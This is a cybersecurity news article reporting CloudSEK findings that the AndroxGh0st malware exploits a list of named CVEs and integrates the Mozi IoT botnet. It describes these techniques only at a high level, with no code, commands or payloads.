AndroxGh0st Malware Targets IoT with Mozi Botnet Integration
AndroxGh0st Malware Expands Attack Vector, Exploiting Critical Vulnerabilities
The AndroxGh0st malware is ramping up its operations by exploiting an extensive range of security vulnerabilities across various internet-facing applications. This potent threat actor is not only deploying the notorious Mozi botnet but also using advanced techniques to infiltrate critical infrastructures. According to a recent report by CloudSEK, the use of remote code execution and credential-stealing methods enables AndroxGh0st to maintain persistent access to compromised systems.
AndroxGh0st is a Python-based cloud attack tool specifically designed to target Laravel applications. Its primary aim is to extract sensitive information from services such as Amazon Web Services (AWS), SendGrid, and Twilio. Active since at least 2022, AndroxGh0st has previously exploited vulnerabilities in the Apache web server (CVE-2021-41773), Laravel Framework (CVE-2018-15133), and PHPUnit (CVE-2017-9841) to gain initial access and escalate privileges within target networks.
The Evolution of AndroxGh0st Malware
In January 2023, U.S. cybersecurity and intelligence agencies revealed that the AndroxGh0st malware is also being used to create a botnet aimed at identifying and exploiting victims within target networks. The latest findings from CloudSEK indicate a strategic expansion in the targeting focus of this malware, with several new vulnerabilities being exploited for initial access:
- CVE-2014-2120 (CVSS score: 4.3) – Cisco ASA WebVPN login page XSS vulnerability
- CVE-2018-10561 (CVSS score: 9.8) – Dasan GPON authentication bypass vulnerability
- CVE-2018-10562 (CVSS score: 9.8) – Dasan GPON command injection vulnerability
- CVE-2021-26086 (CVSS score: 5.3) – Atlassian Jira path traversal vulnerability
- CVE-2021-41277 (CVSS score: 7.5) – Metabase GeoJSON map local file inclusion vulnerability
- CVE-2022-1040 (CVSS score: 9.8) – Sophos Firewall authentication bypass vulnerability
- CVE-2022-21587 (CVSS score: 9.8) – Oracle E-Business Suite (EBS) unauthenticated arbitrary file upload vulnerability
- CVE-2023-1389 (CVSS score: 8.8) – TP-Link Archer AX21 firmware command injection vulnerability
- CVE-2024-4577 (CVSS score: 9.8) – PHP CGI argument injection vulnerability
- CVE-2024-36401 (CVSS score: 9.8) – GeoServer remote code execution vulnerability
CloudSEK reports that AndroxGh0st employs common administrative usernames and a predictable password pattern to gain access, often redirecting to the /wp-admin/ URL, which is crucial for WordPress site management.
The Role of Mozi Botnet in AndroxGh0st Operations
The attacks have also demonstrated the use of unauthenticated command execution vulnerabilities in Netgear DGN devices and Dasan GPON home routers to deploy a payload named "Mozi.m" from various external servers. Mozi is known for targeting IoT devices and incorporating them into a malicious network for carrying out distributed denial-of-service (DDoS) attacks.
While the creators of this malware were apprehended by Chinese law enforcement in September 2021, Mozi activity saw a significant reduction only in August 2023, following a kill switch command that stopped the malware. It is suspected that either the botnet creators or Chinese authorities initiated this termination.
The integration of Mozi into AndroxGh0st signifies a potential operational alliance, enhancing its capacity to infect more devices than before. CloudSEK notes, "AndroxGh0st is not just collaborating with Mozi but embedding its specific functionalities into its standard operations." This collaboration could streamline the control over a broader array of devices, thereby amplifying the effectiveness of both botnets.
Conclusion: Stay Informed and Secure
The evolving threat landscape presented by AndroxGh0st and its integration with the Mozi botnet underscores the importance of maintaining robust cybersecurity measures. Organizations must stay informed about vulnerabilities and adopt proactive strategies to safeguard critical infrastructures.
Are you concerned about the rising threat of malware like AndroxGh0st? Share your thoughts below and consider exploring our related articles for more insights on cybersecurity trends and best practices. For more exclusive content, follow us on Twitter and LinkedIn!